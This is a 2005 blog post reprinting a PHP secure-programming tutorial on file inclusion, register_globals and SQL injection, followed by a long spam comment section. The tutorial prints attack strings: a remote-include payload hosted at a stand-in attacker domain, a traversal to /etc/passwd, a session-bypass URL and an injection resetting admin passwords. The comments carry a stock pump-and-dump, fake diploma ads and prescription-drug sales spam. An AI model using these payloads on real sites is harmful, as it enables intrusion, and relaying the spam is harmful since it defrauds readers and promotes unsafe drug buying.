javascript hit counter Web World: Secure Programming in PHP
Nikhil Sheth

Web World

This site is for php , mysql , flash,.... Inshort for any web related stuff

Tuesday, June 07, 2005

Secure Programming in PHP

Introduction

The goal of this paper is not only to show common threats and challenges of programming secure PHP applications but also to show you practical methods for doing so. The wonderful thing about PHP is that people with little or even no programming experience are able to achieve simple goals very quickly. The problem, on the other hand, is that many programmers are not really conscious about what is going behind the curtains. Security and convenience do not often go hand in hand -- but they can.

Dangers

Files

PHP has some very flexible file handling functions. The include(), require() and fopen() functions accept local path names as well as remote files using URLs. A lot of vulnerabilities I have seen are due to incorrect handling of dynamic file or path names.

Example

On a site I will not mention in this article (because the problem still has not been solved) has one script which includes various HTML files and displays them in the proper layout. Have a look at the following URL: http://example.com/page.php?i=aboutus.html The variable $i obviously contains the file name to be included. When you see a URL like this, a lot of questions should come to your mind:
  • Has the programmer considered directory traversals like i=../../../etc/passwd?
  • Does he check for the .html extension?
  • Does he use fopen() to include the files?
  • Has he thought about not allowing remote files?
In this case, every answer was negative. Time to play! Of course, it is now possible to read all the files the httpd user has read access for. But what is even more exciting is the fact that the include() function is used to include the HTML file. Consider this: http://example.com/page.php?i=http://evilhacker.org/exec.html Where exec.html contains a couple of lines of code: php
passthru
('id');
passthru ('ls -al /etc');
passthru ('ping -c 1 evilhaxor.org');
passthru ('echo You have been hax0red | mail root');
?>
I am sure you get the idea. A lot of bad things can be done from here.

Global Variables

Per default, PHP writes most of the variables into the global scope. Of course, this is very convenient. On the other hand, you can get lost in large scripts very quickly. Where did that variable come from? If it is not set, where could it come from? All EGPCS (Environment, GET, POST, Cookie, and Server) variables are put into the global scope.

The global associative arrays $HTTP_ENV_VARS, $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_SERVER_VARS and $HTTP_SESSION_VARS will be created when the configuration directive track_vars is set. This allows you to look for a variable only in the place you expect it to come from. Note: As of PHP 4.0.3, track_vars is always turned on.

Example

This security hole was reported to the Bugtraq mailing list by Ismael Peinado Palomo on July 25th, 2001. Mambo Site Server 3.0.x, a dynamic portal engine and content management tool based on PHP and MySQL, is vulnerable to a typical global scope exploit. The code has been modified and simplified. Under the 'admin/' directory, index.php checks whether the password matches the one in the database after posting the form: php
if ($dbpass == $pass) {
session_register("myname");
session_register("fullname");
session_register("userid");
header("Location: index2.php");
}
?>
When the passwords match, the variables $myname, $fullname and $userid are registered as session variables. The user then gets redirected to index2.php. Let us see what happens there: php
if (!$PHPSESSID) {
header("Location: index.php");
exit(
0);
} else {
session_start();
if (!
$myname) session_register("myname");
if (!
$fullname) session_register("fullname");
if (!
$userid) session_register("userid");
}
?>
If the session ID has not been set, the user will be directed back to the login screen. If there is a session ID, though, the script will resume the session and will put the previously set session variables into the global scope. Nice. Let us see how we can exploit this. Consider the following URL: http://example.ch/admin/index2.php?PHPSESSID=1&myname=admin&fullname=joey&userid=admin The GET variables $PHPSESSID, $myname, $fullname and $userid are created as global variables per default. So when you look at the if-else-structure above, you will notice that the script figures $PHPSESSID is set and that the three variables dedicated to authorize and identify the user can be set to anything you want. The database has not even been queried. A quick fix for this problem -- by far not the perfect one -- would be to check for $HTTP_SESSION_VARS['userid'] or $_SESSION['userid'] (PHP => v4.1.0) instead of $userid. If you are serious about making secure web applications read chapter 3.3.

SQL

Programming in PHP would be boring without a decent SQL database connected to the web server. However, assembling SQL queries with unchecked variables is a dangerous thing to do.

Example

The following bug in PHP-Nuke 5.x has been reported to the Bugtraq mailing on August 3, 2001. It is actually a combination of exploiting global variables and an unchecked SQL query variable. The PHP-Nuke developers decided to add the "nuke" prefix to all tables in order to avoid conflicts with other scripts. The prefix can be changed when multiple Nuke sites are run using the same database. Per default, $prefix = "nuke"; is defined in the configuration file config.php. Let us now look at a few lines from the script article.php. php
if (!isset($mainfile)) {
include(
"mainfile.php");
}
if (!isset(
$sid) && !isset($tid)) {
exit();
}
?>
And a bit further down: the SQL query. php
mysql_query
("UPDATE $prefix"._stories.
" SET counter=counter+1 where sid=$sid");
?>
To change the SQL query, we need to make sure $prefix is not set to its default value so we can set an arbitrary value via GET. The configuration file config.php is included in mainfile.php. As we know from the last chapter, we can set the variables $mainfile, $sid and $tid to any value using GET parameters. By doing so, the script will think mainfile.php has been included and $prefix has been set accordingly. Now, we are in a position to execute any SQL query starting with UPDATE. So the following query will set all admin passwords to '1': http://example.com/article.php?mainfile=1&sid=1&tid=1&prefix=nuke.authors%20set%20pwd=1%23 The query now looks like this: UPDATE nuke.nuke_authors set pwd=1#_stories
SET counter=counter+1 where sid=$sid");
Of course, anything after # will be considered as a comment and will be ignored.

Secure Programming

Awareness

Before taking any technical measures, you have to realize that you cannot trust any input from external sources. Whether it is a GET or POST parameter or even a cookie, it can be set to anything. User-side JavaScript form checks will not make any difference. ;)

Check User Variables

Every external variable has to be verified. In many cases you can just use type casting. For example, when you pass a database table id as a GET parameter the following line would do the trick: $id = (int)$HTTP_GET_VARS['id'];
or $id = (int)$_GET['id']; /* (PHP => v4.1.0) */ Now you can be sure $id contains an integer. If somebody tried to modify your SQL query by passing a string, the value would simply be 0. Checking strings is a little more difficult. In my opinion, the only professional way to do this is by using regular expressions. I know that many of you try to avoid them but -- believe me -- they are great fun once you got the basic idea. As an example, the variable $i from chapter 2.1. can be verified with this expression: php
if (ereg("^[a-z]+\.html$", $id)) {
echo
"Good!";
} else {
die(
"Try hacking somebody else's site.");
}
?>
This script will only continue when the $id variable contains a file name starting with some lowercase alphabetic characters and ending with a .html extension. I will not go into regular expression details but I strongly recommend you the book "Mastering Regular Expressions" by Jeffrey E. F. Friedl (O'Reilly).

Master the Global Variable Scope

I am glad I did not have much time to write this article in early December 2001, because in the meantime Andi and Zeev added some very useful arrays in PHP v4.1.0: $_GET, $_POST, $_COOKIE, $_SERVER, $_ENV and $_SESSION. These variables deprecate the old $HTTP_*_VARS arrays and can be used regardless of the scope. There is no need to import them using the global statement within functions. Do yourself a favour and turn the configuration directive register_globals off. This will cause your GET, POST, Cookie, Server, Environment and Session variables not to be in the global scope anymore. Of course, this requires you to change your coding practice a little. But it is definitely a good thing to know where your variables come from. It will help you prevent security holes described in chapter 2.2. This simple example will show you the difference: Bad: php
function session_auth_check() {
global
$auth;
if (!
$auth) {
die(
"Authorization required.");
}
}
?>
Good: php
function session_auth_check() {
if (!
$_SESSION['auth']) {
die(
"Authorization required.");
}
}
?>

Logging

In a production environment it is a good idea to set the error_reporting level to 0. Use the error_log() function to log errors to a file or even alert yourself via e-mail. If you are really concerned about security, you can even do some preventive "intrusion detection". For example, you could send yourself an e-mail alert when somebody plays with GET/POST/Cookie parameters and the regular expression function returns false accordingly.

Conclusion

Programming securely definitely needs a little more time than the "Wow, it works!" technique. But as you can see by the examples, you cannot afford to ignore security. I hope I could make you think about how to improve your existing applications and especially how to change your programming practice in the future. Happy hacking!

101 Comments:

  • At 6:17 AM, Anonymous Alberto said…

    I am surprised to see few comments on this blog. It is an excellent blog. I would have expected more debate. Anyway the blog is still pretty good, my congratulations.
    Alberto

     
  • At 9:42 AM, Blogger Niks said…

    Hey, Thanks for comment Alberto

     
  • At 9:26 AM, Blogger abbie593thomas said…

    ='Brand New News From The Timber Industry!!'=

    ========Latest Profile==========
    Energy & Asset Technology, Inc. (EGTY)
    Current Price $0.15
    ================================

    Recognize this undiscovered gem which is poised to jump!!

    Please read the following Announcement in its Entierty and
    Consider the Possibilities
    Watch this One to Trade!

    Because, EGTY has secured the global rights to market
    genetically enhanced fast growing, hard-wood trees!

    EGTY trading volume is beginning to surge with landslide Announcement.
    The value of this Stock appears poised for growth! This one will not
    remain on the ground floor for long.

    Keep Reading!!!!

    ===============
    "BREAKING NEWS"
    ===============

    -Energy and Asset Technology, Inc. (EGTY) owns a global license to market
    the genetically enhanced Global Cedar growth trees, with plans to
    REVOLUTIONIZE the forest-timber industry.

    These newly enhanced Global Cedar trees require only 9-12 years of growth before they can
    be harvested for lumber, whereas worldwide growth time for lumber is 30-50 years.

    Other than growing at an astonishing rate, the Global Cedar has a number of other benefits.
    Its natural elements make it resistant to termites, and the lack of oils and sap found in the wood
    make it resistant to forest fire, ensuring higher returns on investments.

    the wood is very lightweight and strong, lighter than Poplar and over twice
    as strong as Balsa, which makes it great for construction. It also has
    the unique ability to regrow itself from the stump, minimizing the land and
    time to replant and develop new root systems.

    Based on current resources and agreements, EGTY projects revenues of $140 Million
    with an approximate profit margin of 40% for each 9-year cycle. With anticipated
    growth, EGTY is expected to challenge Deltic Timber Corp. during its initial 9-year cycle.

    Deltic Timber Corp. currently trades at over $38.00 a share with about $153 Million in revenues.
    As the reputation and demand for the Global Cedar tree continues to grow around the world
    EGTY believes additional multi-million dollar agreements will be forthcoming. The Global Cedar nursery has produced
    about 100,000 infant plants and is developing a production growth target of 250,000 infant plants per month.

    Energy and Asset Technology is currently in negotiations with land and business owners in New Zealand,
    Greece and Malaysia regarding the purchase of their popular and profitable fast growing infant tree plants.
    Inquiries from the governments of Brazil and Ecuador are also being evaluated.

    Conclusion:

    The examples above show the Awesome, Earning Potential of little
    known Companies That Explode onto Investor�s Radar Screens.
    This stock will not be a Secret for long. Then You May Feel the Desire to Act Right
    Now! And Please Watch This One Trade!!


    GO EGTY!


    All statements made are our express opinion only and should be treated as such.
    We may own, take position and sell any securities mentioned at any time. Any statements that express or involve discussions with respect
    to predictions, goals, expectations, beliefs, plans, projections, objectives, assumptions or future events or performance are
    not statements of historical fact and may be "forward, looking
    statements." forward, looking statements are based on expectations, estimates
    and projections at the time the statements are made that involve a number of risks and uncertainties which could cause actual results
    or events to differ materially from those presently anticipated. This newsletter was paid $3,000 from third party (IR Marketing).
    Forward,|ooking statements in this action may be identified through the use of words such as: "projects", "foresee", "expects". in compliance with Se'ction 17. {b), we disclose the holding of EGTY shares prior to the publication of this report. Be aware of an inherent conflict of interest resulting from such holdings due to our intent to profit from the liquidation of these shares. Shares may be sold at any time, even after positive statements have been made regarding the above company. Since we own shares, there is an inherent conflict of interest in our statements and opinions. Readers of this publication are cautioned not to place undue reliance on forward,looking statements, which are based on certain assumptions and expectations involving various risks and uncertainties that could cause results to
    differ materially from those set forth in the forward- looking statements. This is not solicitation to buy or sell stocks, this text is
    or informational purpose only and you should seek professional advice from registered financial advisor before you do anything related with buying or selling stocks, penny stocks are very high risk and you can lose your entire investment.

     
  • At 7:05 AM, Anonymous Anonymous said…

    affiliate click pay per is great

    i found here searching for the word affiliate click pay per and your site was listed high on the word affiliate click pay per
    GOOD JOB

    affiliate click pay per

     
  • At 9:59 AM, Anonymous Anonymous said…

    This blog is great! If you get a chance you may want to visit this seo tips
    site, it's

    pretty awesome, too!

     
  • At 2:55 PM, Anonymous Anonymous said…

    Hey i got here searching for real estate affiliate program
    Your sites not too bad!

    You got good rankings for them keywords real estate affiliate program

    Check out my site
    real estate affiliate program

     
  • At 1:06 AM, Blogger Johnjon said…

    I discuss this topic daily myself. I also have a website that talks about affiliate r related things. Go check it out if you get a chance.

     
  • At 5:45 PM, Blogger Danny White said…

    Nice blog! I have a free mortgage lead site I thought you and your visitors might like.

    Click on free mortgage lead to check it out. free mortgage lead

     
  • At 6:14 AM, Anonymous Anonymous said…

    "Hi there, I just came across your blog about ad classified free submit and wanted to drop you a note telling you how impressed I was with the information you have posted here. I also have a web site related to ad classified free submit so I know what I am talking about when I say your site is top-notch! Keep up the great work, you are providing a great resource on the Internet here!"

     
  • At 8:51 PM, Anonymous Automotive Mechanics said…

    Hey Niks,

    Your blog "Secure Programming in PHP", leads me to believe you will find my information on our Best Career Wages site to be very beneficial.

    Some of the not so common searches that found our extensive wages site included ...

    Aircraft Mechanics Wages
    Aircraft Service Technicians Wages
    Automotive Body Repairers Wages
    Automotive Glass Installers Wages
    Automotive Glass Repairers Wages
    Automotive Service Technicians Wages
    Automotive Mechanics Wages
    Avionics Technicians Wages.


    We have many hundreds of "essential to read" articles on wages and career topics in addition to many other popular subjects in our Average Career Wages site.

    Best Wishes
    Emily

     
  • At 7:02 AM, Anonymous net web hosting said…

    I love your blog Niks. How long has it been on-line? Reason I ask is I am doing a ton of work in the area of lowcost web hosting and will probably end up starting a blog of my own. Funny how the internet brought me here when I was doing searches on lowcost web hosting. Oh well, I am glad it did. Keep up the great blogging and I am sure I will visit Secure Programming in PHP again!!

     
  • At 6:04 AM, Anonymous web space hosting said…

    Sad to say I just got back from a bowling tournament and decided to log in and do some websurfing. Niks I love your blog. I had some very good laughs. I am doing a paper on lowcost web hosting and have been downloading information for the last hour. I don’t know how I came across Secure Programming in PHP but I am glad I did. It has set me back a little because I have spent the last hour reading your archives. If you don’t mind I would like to add you to my favorites so I can back again and read some more. Well I need to get back to lowcost web hosting. I am almost finished with it. Great job.
    p.s some very good points on your blog

     
  • At 1:34 AM, Anonymous free article submissions said…

    I skim a lot of blogs, and so far yours is in the Top 3 of my list of favorites. I'm going to dive in and try my hand at it, so wish me luck.

    I've got a site you might be interested in (mine is about ezine article submission ) I know, it sounds strange, but it's like anything, once you learn more about it, it's pretty cool. It's mostly about ezine article submission related articles and subjects.

     
  • At 1:14 PM, Anonymous website placement said…

    Hello: Niks, I was looking for some information on website placement and found your site. I'm sure you know how it is when you start to read a interesting post…most time you just have to read it all. Bottom line, I've enjoyed reading your Blog. I’ve got you bookmarked for the future. I'm doing a little test to see how many people actually read these posts. So, for the next few weeks anyone who visits my Blog, I'll send a great 90+ page search engine optimization ebook! Yes, this is a not strings attached deal. Well, I’m off again in search of the info I seek . Thanks for the read!

     
  • At 7:36 PM, Anonymous calgary web hosting said…

    I have been on-line searching for hours for information regarding web hosting company for small business and stumbled across your blog during my journey :-) Niks your blog is really amazing! Keep up the great work. Obviously my search on web hosting company for small business was way off when compared to Secure Programming in PHP and find it funny how it landed me here. The internet is a funny thing. Anyways, great job on your blogging and keep up the good work! I been searching for web hosting company for small business for over 2 hours and needed a break from it. I started reading your blog and really started getting into it.
    P.S I will add you to my favorites so I can come back and visit later
    P.S.S If you want to bookmark my site I am at web hosting company for small business. You never know you may find some good deals!

     
  • At 7:29 PM, Anonymous net web hosting said…

    What up Niks! I just finished up a ten hour work day and decided to kick back and do some surfing. So I grabbed myself a drink and stumbled across your blog while doing some research on calgary web hosting for a upcoming project I am doing. Well even though Secure Programming in PHP isn’t what I was looking for I really enjoyed reading your blog. Your doing a great job and please keep up the good work. Lots of people do not keep their blogs up to date :0) There are some very interesting view points stated here. Anyways I am going to grab the bull by the horns and continue to plug away at calgary web hosting. I have already bookmarked your blog. You many want to visit me at calgary web hosting. You never know you might see something you like! Again great job.

     
  • At 9:28 PM, Anonymous web site for sale said…

    A Useful Blog to Bookmark!!! I have just come back to my desk from a good rest. Feeling great I surf into your blog. The info you have provided is very interesting indeed. Keep up the good work and Feel free to visit the following business opportunity site which has much of all the business opportunity related leads.

    Good Life certainly demands a good income and that is our mission. Our desire is to provide all families worldwide great opportunities to increase their family income so that their children can be well cared for and can get a very good education or the things they can enjoy most and be among the most happy in life.

    Take charge of your life and family, the following sites offer the best home based business opportunities, domains, hosting, search engine submission and marketing:
    Daily Cash Sites, Online Business Opportunities, Cash Income, Egold, Online Payment Commission, Education, Email marketing, Bulk Email, Resell Rights, Marketing, Buy eGold, Websites for Sale, Family Income, Search Engine Traffic, Domains, Web Hosting, Auto Ad Submitter, Web Traffic, Traffic Booster, Sitesell Website, Home Based Business, Domain Hosting, Netsuitestore, Nutritional Supplements, Native Remedies, Herbal Supplements, Anti Aging

    Click on google's:
    Earn High Income, Increase My Income, Online Income Opportunities

    We can all be Blessed more by Blessing others!

    Take care!
    ==============================================

     
  • At 5:24 PM, Anonymous lowcost web hosting said…

    Well I just got back from the gym and I am beat. I am currently doing some research on lowcost web hosting and stumbled across your blog. Which cracks me up really. The internet can certainly land you off base sometimes. Even though Secure Programming in PHP is not completely related I think it is a cool blog. I have read back through the archives and lots of people make some very good points. Well I have been on-line forever it seems. I need to continue to plug away at lowcost web hosting. If you have the energy swing by lowcost web hosting. I try to update my site weekly and maybe you will see something you like. I already snagged your URL and put it in my favorites. If you do not mind I will be back again. Great job!

     
  • At 3:01 AM, Anonymous lingerie web site for sale said…

    A Useful Blog to Bookmark!!! I have just come back to my desk from a good rest. Feeling great I surf into your blog. The info you have provided is very useful. Keep up the good work and Feel free to visit the following established web site for sale site which has much of all the established web site for sale related leads.

    Good Life certainly demands a good income and that is our mission. Our desire is to provide all families worldwide great opportunities to increase their family income so that their children can be well cared for and can get a very good education or the things they can enjoy most and be among the most happy in life.

    Take charge of your life and family, Click and Bookmark the following sites, they offer the best home based business opportunities, domains, hosting, search engine submission and marketing:
    Daily Cash Sites, Online Business Opportunities, Cash Income, Egold, Online Payment Commission, Education, Email marketing, Bulk Email, Resell Rights, Marketing, Buy eGold, Websites for Sale, Family Income, Search Engine Traffic, Domains, Web Hosting, Auto Ad Submitter, Web Traffic, Traffic Booster, Sitesell Website, Home Based Business, Domain Hosting, Netsuitestore.

    Click and Bookmark Google's: Earn High Income, Increase My Income, Online Income Opportunities

    The world's best online marketing software and services are all here for you to choose from. These marketing software and services will determine your many online successes now and in years to come. Click on the hyperlinks for further information ...
    1) The Rich Jerk - Stop Being a Pathetic Loser.
    2) Affiliate Cash Vault - New fail-safe system virtually runs 100% on autopilot. Just set it and forget it!
    3) Google Profits - How to Make Massive Profits Combining the Power of Google and CB.
    4) Google Cash - Official Google Cash How to Earn Thousands Writing Google AdWords Part-Time updated w/ 24 videos.
    5) BlogBlaster Submits To 2 Million Sites - Brand new advertising software submits to 2 million blogs!
    6) Brand New Adwords Software - Become A Super Affiliate Overnight! Software Finds Most Profitable Search Terms And Products For You!
    7) Instantly Increase Your Traffic & Sales - Instant Booster - Incredible Software increases your Income Instantly.
    8) Fire Sale Profits - Discover the Secrets of Successful Fire Sales and How You Can Make A Fortune Selling Downloadable Products!
    9) Easiest Way To Make $100+ A Day SwapClix - Instant Money Generator, Guaranteed Results, Work From Home Make Money Now! We Hide Your Affiliate Id! No Commision Stealing!
    10) Process Instant Rebates Online - Make Money Online! Low Refunds.
    11) The Lazy Pig - Convert $1 To $85 - Undisclosed Revolutionary 7 Step Adsense Marketing System.
    12) AdBlaster Submits To 2,500,000 Sites - AdBlaster blasts to 2,500,000 Websites with just 1 click!
    13) AdSense Gold-Your Fast Track To Profits - Triple your Ctr, skyrocket your Epc, track your clicks by search engine, referrer and more! Learn how to join the AdSense Elite.
    14) 1stPromotion - Pro2 Mall & Portal - The Ultimate CB Mall & Affiliate Portal. The Only Mall That Gives You Total Control. Thousands Of Products, One Url.
    15) The Google Ca$h Machine - Start Earning 15 Minutes from Now! Automatically.
    16) The Article System - Content Generator - Instantly add targeted content to your website. Create pages that search engines will index to boost your traffic and profit!
    17) Massive Targeted Traffic Guaranteed - Amazing Formula Allows You To Drive All The Targeted Website Traffic You Could Ever Possibly Want!
    18) Google Adsense Secrets - Second Edition - Incredible Google Adsense secrets revealed by Pro who earns over $500/day - Breakthrough best-selling eBook - Instant download!
    19) Make Big Money Taking Surveys Online - Get Paid $25.00-75.00 Per Survey Completed! High Conversions! Low Refunds!
    20) Search Engine Cloaker (since 1995) - We are proud to help our customers achieve number 1 rankings in all engines for 10+ years.
    21) Rapid Search Engine Placement. - This product will get your website listed on Msn, Yahoo and Google. Proven technique easy to use!
    22) Super Affiliate Marketer's Secret Weapon - Drive Massive Amounts of Laser-Targeted Traffic to Your Site And Instantly Uncover Niche Markets That You Can Easily Dominate!
    23) 1 Million Free Visitors On Your Website - I have become a multi-millionaire on the Internet by using these secrets! You don't need to buy any advertising online!
    24) AffiliateMoneyTree.com - Huge Payouts - Make $18,659 a Month on Google Adwords! (Tip: Promote People-Search.com on Adwords using conversion tracking! Huge $ Niche!
    25) Online Gold Finder - Online Gold Finder will help you find hidden profitable online niches in seconds.
    26) Your License To Print Money System - Combine CB & AdWords for guaranteed income.
    27) Secrets Of The Big Dogs - eBook detailing Internet promotion techniques.
    28) 2Bucks' An Ad Advertising Program - Ads in multiple ezines for $1.00 each (or less) 80 ezines, 1,280,000+ subs. (Oct 2005).
    29) Turn Words Into Traffic - Simple 'traffic Machine' Creates Instant Avalanche of Free Traffic to your website or affiliate links!
    30) Ez Search Engine Optimization - Search engine optimization tips & advice.
    31) The Next Generation Rss (Seo) Software - The Seo experts don't want you know about this powerful tool
    32) Ad Word Generator - Brand New Software that Instantly Creates Profitable Google Adwords!
    33) Get Organized Now - Ideas, tips, tools and more to help you organize your home, your office and your life!
    34) Secret Spider Generator - The Key to Google's Back Door.
    35) The Web's Greatest How-To Toolkits - Discover the Toolkits that are earning a fortune for our affiliates. And join them right now!
    36) Traffic Solutions - 20,000 Real Visitors! $12.95!
    37) Search Automator - In Seconds, Your Keyword Search Turns Into A Treasure-Trove Of Websites, eBooks, Articles, Mp3s, Videos, Guides, And More.
    38) When Mr Cb - Meets - Mr SuperTips - He's the world's top CB expert - and he's giving you all his secrets. 39) Reaching 64.8% Internet Users You Miss - 100% Safe and Ethical Search Engine Marketing Strategy - Google Approved - Double or Even Triple Your Website Traffic.
    41) Auto Submit To 3,000,000+ Websites. - Blast Your Ad to 3,000,000+ Classified Websites! Plus Huge Array of Marketing Tools.
    42) Profit Plan - Private Members Bonus Site that absolutely Guarantees you will make a profit - Immediately!
    43) Dynamic Revenue Generating Content - Unlock the Full Potential of Your Website to Double, Triple, or Even Quadruple Your Website Revenue!
    44) Page Zero - Enlightened Search Marketing - Google AdWords and paid search campaign management consulting & eBooks.
    45) Php Reciprocal Linking Management Script - Increase your search engine rankings, increase your websites link popularity and receive free targeted traffic to your website.
    46) E-Book Compiler Software - Create your own E-Books to sell or to promote your site (Free trial download available)
    47) Article Equalizer - The Fastest, Easiest and Most Efficent Method of Adding Tons of Quality Content to Your Website!
    48) Make Your Website Sell Like Crazy - Now You Can Use The Proven Marketing Secrets of the World's Top Marketers To Make Your Ads and Letters Sell Like Crazy.
    49) Internet Marketing Exposed - How To Turn Your Passion or Hobby Into a $100,000 a Year Money Machine on the Internet.
    51) EzineAd.net - Ezine Advertising Special $15 for 300,000+ Subscribers. Total 1 Million Subscribers ( Aug 2003)
    52) Affiliate Link Cloaker - Stop Affiliate Link Hijackers - Dead in Their Tracks! Stop Losing Your Commissions to affiliate link sneak thieves!
    53) The Truth About Internet Marketing - Discover the astonishing whole truth and nothing but the truth about internet marketing!
    54) Casino Affiliate Secrets - If I told you the secrets of how casino super affiliates make in excess of $50,000 every month would you be interested?
    55) Make More Money With Google Adsense - The guide to increasing your Adsense Income with Url Filtering.
    56) The Revolutionary Squeeze Page Generator - Introducing a new software that can automatically generate a fully-integrated profit-boosting squeeze page in just 4 clicks.
    57) Sell eBooks Package-Full Resale Rights - The Ultimate eBooks reseller package, complete with plug in websites.
    58) 378 Internet Marketing Predictions - Discover & Profit from the future of Internet Marketing: Trends,Forecasts,Predictions.
    59) ClickAdsPro - Earn More Money Today - Learn how I made 9120 marketers work for me!
    60) Top Search Engine Ranking Secrets In Google Revealed - Discover powerful Seo secrets to drive 17,282 Monthly Unique Targeted Visitors from top google rankings.

    For your family's healthcare, feel free to surf and bookmark: Nutritional Supplements, Native Remedies, Herbal Supplements, Anti Aging
    ===============================================

     
  • At 6:22 AM, Anonymous net web hosting said…

    Sad to say I just got back from a bowling tournament and decided to log in and do some websurfing. Niks I love your blog. I had some very good laughs. I am doing a paper on personal web site hosting and have been downloading information for the last hour. I don’t know how I came across Secure Programming in PHP but I am glad I did. It has set me back a little because I have spent the last hour reading your archives. If you don’t mind I would like to add you to my favorites so I can back again and read some more. Well I need to get back to personal web site hosting. I am almost finished with it. Great job.
    p.s some very good points on your blog

     
  • At 6:02 PM, Anonymous calgary web hosting said…

    Well this blog certainly is not about lowcost web hosting. What the heck! I guess the internet can play some tricks on us sometimes. I have been on-line for two hours
    researching lowcost web hosting and came tumbling across your blog. I LOVE IT! I needed a break from lowcost web hosting anyways :-) If you don't mind I want to add your
    blog to my favorites list so I can come back later on and read some more stuff. Well I guess I should get back to researching lowcost web hosting.
    Even though my search is not on Secure Programming in PHP I am glad I came across your blog. Keep blogging away!

     
  • At 6:26 PM, Anonymous best web hosting company said…

    All I can say is WOW Niks. The other half and I just got back from our friends house (well her friends house) and I needed a huge break. I am working on a project right now that is based on lowcost web hosting. I have literally been on-line for 2-3 hours doing research. Even though Secure Programming in PHP really isn’t on the same page as lowcost web hosting I am certainly glad I came across your blog. There are a ton of great view points on this blog. Well I think I can here the kids screaming in the background. I put you in my internet favorites and I will certainly come back and visit. If you want to take a peek at my site you can find me here at lowcost web hosting. I update my site very frequently. Again, great job blogging and I will be back again soon!

     
  • At 7:28 PM, Anonymous commercial web hosting said…

    I love your blog Niks. How long has it been on-line? Reason I ask is I am doing a ton of work in the area of lowcost web hosting and will probably end up starting a blog of my own. Funny how the internet brought me here when I was doing searches on lowcost web hosting. Oh well, I am glad it did. Keep up the great blogging and I am sure I will visit Secure Programming in PHP again!!

     
  • At 1:18 AM, Anonymous web hosting company for small business said…

    I love your blog Niks. How long has it been on-line? Reason I ask is I am doing a ton of work in the area of net web hosting and will probably end up starting a blog of my own. Funny how the internet brought me here when I was doing searches on net web hosting. Oh well, I am glad it did. Keep up the great blogging and I am sure I will visit Secure Programming in PHP again!!

     
  • At 7:49 PM, Anonymous web space hosting said…

    Hey Niks. Very nice blog :0) I just got inside from washing and waxing my truck. It is my baby. Took me 2 hours though. So I settled down into my basement and started doing some web surfing. Anyways I am in the process of grabbing my masters degree and have spent the last 6 months researching personal web site hosting. In the midst of my surfing I landed smack dab in the middle of your blog. I hope you do not think I am intruding but I must say it is great blog. Even though Secure Programming in PHP is way off base from personal web site hosting I found myself cruising through your blog archives for the last half hour :0) You have some nice blogging friends. Anyways, I need to get back to my mission. I wrote don’t your url and feel free to visit me here at personal web site hosting. I am so busy so I can only update my site monthly. Keep up the great work.

     
  • At 12:43 AM, Anonymous my article submission said…

    Not what I was searching for, but none the less an interesting blog here. Thanks for putting it up. I've enjoyed reading alot of the text here. I got you bookmarked for the future, I'll be back.

    I have a similar site related to future article submission Come by some time.

     
  • At 5:38 AM, Anonymous commercial web hosting said…

    I love your blog Niks. How long has it been on-line? Reason I ask is I am doing a ton of work in the area of calgary web hosting and will probably end up starting a blog of my own. Funny how the internet brought me here when I was doing searches on calgary web hosting. Oh well, I am glad it did. Keep up the great blogging and I am sure I will visit Secure Programming in PHP again!!

     
  • At 3:24 PM, Anonymous free people search said…

    I just ran across this post while conducting some research on various "free people finder" sites. Even though it isn’t exactly what I was searching for, I think the people who visit your post might still be interested in reading my article on "free people finder". I try to answer the question: Are there really "free people finder" sites? Even though it's not what I am looking for, I'm glad I stopped long enough to read -- thanks. Just thought you'd like to know.

     
  • At 10:17 PM, Anonymous absolutely free people search said…

    I just ran across this post while conducting some research on various "free people finder" sites. Even though it isn’t exactly what I was searching for, I think the people who visit your post might still be interested in reading my article on "free people finder". I try to answer the question: Are there really "free people finder" sites? Even though it's not what I am looking for, I'm glad I stopped long enough to read -- thanks. Just thought you'd like to know.

     
  • At 10:50 PM, Blogger marktheo11566592 said…

    Get your High School Diploma, Or any Desired College Degree, In less then 2 weeks.

    Call this number now 24 hours a day 7 days a week (413) 208-3069

    Get these Degrees NOW!!!

    High School Diploma "BA", "BSc", "MA", "MSc", "MBA", "PHD",

    Get everything within 2 weeks.
    100% verifiable, this is a real deal

    Act now you owe it to your future.

    (413) 208-3069 call now 24 hours a day, 7 days a week.

     
  • At 6:56 PM, Anonymous Anonymous said…

    Hey, while searching for widgets for my blog, I stumbled upon www.widgetmate.com and wow! I found what I wanted. A cool news widget. My blog is now showing latest news with title, description and images. Took just few minutes to add. Awesome!

     
  • At 5:10 AM, Anonymous Anonymous said…

    diazepam 10 mg buy generic diazepam usa - buy diazepam line usa

     
  • At 6:27 AM, Anonymous Anonymous said…

    diazepam 5mg buy valium online overnight - valium side effects (eyes)

     
  • At 11:10 AM, Anonymous Anonymous said…

    generic xanax generic form of xanax - many grams xanax overdose

     
  • At 2:19 PM, Anonymous Anonymous said…

    cheapest ativan lorazepam online kaufen - ativan iv push side effects

     
  • At 4:05 PM, Anonymous Anonymous said…

    buy xanax overnight delivery xanax side effects sexually - xanax bars ingredients

     
  • At 5:11 PM, Anonymous Anonymous said…

    where to buy xanax online xanax vodka overdose - xanax and alcohol lethal

     
  • At 10:51 PM, Anonymous Anonymous said…

    ambien cost withdrawal symptoms from ambien cr - ambience mall gurgaon bluo

     
  • At 8:45 AM, Anonymous Anonymous said…

    buy diazepam buy valium with paypal - diazepam dosage for elderly

     
  • At 9:52 AM, Anonymous Anonymous said…

    buy valium diazepam diazepam 10 mg for sale - diazepam good valium

     
  • At 2:25 PM, Anonymous Anonymous said…

    diazepam 10 mg diazepam dosage neck pain - diazepam withdrawal time

     
  • At 5:15 PM, Anonymous Anonymous said…

    buy diazepam diazepam low dosage - generic diazepam manufacturers

     
  • At 12:18 AM, Anonymous Anonymous said…

    ambien zolpidem zolpidem side effects long term - generic ambien dosage

     
  • At 1:21 AM, Anonymous Anonymous said…

    ativan pharmacy ativan dosage social anxiety - ativan dosage for insomnia

     
  • At 2:11 AM, Anonymous Anonymous said…

    xanax no rx generic xanax vs brand - where to buy real xanax online

     
  • At 2:15 AM, Anonymous Anonymous said…

    generic ativan online ativan no prescription online pharmacy - recovering from ativan overdose

     
  • At 2:20 AM, Anonymous Anonymous said…

    buy lorazepam ativan dosage 1mg - ativan and alcohol withdrawal treatment

     
  • At 3:43 AM, Anonymous Anonymous said…

    buy diazepam correct dosage of diazepam for dogs - generic name of diazepam

     
  • At 6:43 AM, Anonymous Anonymous said…

    buy diazepam 2mg diazepam compared xanax - buy diazepam in australia

     
  • At 7:53 PM, Anonymous Anonymous said…

